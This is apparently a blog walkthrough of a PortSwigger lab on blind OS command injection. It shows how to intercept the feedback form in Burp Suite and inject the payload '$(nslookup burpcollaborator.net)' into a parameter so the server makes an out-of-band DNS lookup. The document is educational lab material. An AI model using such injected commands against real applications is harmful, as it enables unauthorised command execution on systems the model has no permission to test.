In this post, we’re going to solve the PortSwigger lab: “Blind OS command injection with out-of-band interaction”.

PortSwigger lab start page

To solve the lab, we need to trigger a DNS lookup to the Burp Suite public server (burpcollaborator.net). To do this, we’ll use a Blind OS Command Injection found in the feedback function.

Submit feedback button on the page

Feedback form with fields to fill

As we can see, there are several fields to fill out. So let’s fill them in:

Completed form fields

Now, before submitting the feedback, we prepare Burp Suite to receive the requests:

Proxy configuration in browser

Activating interception in Burp Suite

With this ready, we submit the feedback to capture the request:

Submitting the feedback form

Request intercepted in Burp Suite

This is the request that’s sent to the server when submitting feedback. To handle it, we send it to the repeater by pressing Ctrl R:

Request sent to Burp Suite Repeater

Once in the repeater, we can observe how a valid request simply gets a 200 status response and not much else.

However, among all the parameters being sent, we’re going to try to see if we can execute a command in any of them, and with that, perform a DNS lookup to the Burp Suite server:

Nslookup command injection for DNS lookup

$(nslookup burpcollaborator.net)

When we make this request, if we refresh the page, we’ll realize that we’ve solved the challenge:

Lab completed successfully

In this case, it’s true that the best way to tackle “out-of-band” style challenges is to have Burp Suite PRO to be able to use the Burp Collaborator client feature:

Burp Collaborator client in Burp Suite PRO

In fact, the next and final OS Command Injection challenge (at least as of February 2022) can’t be solved without Burp Suite PRO.

Share on X Share on LinkedIn Share on Telegram
Comment on Discord Visit the author page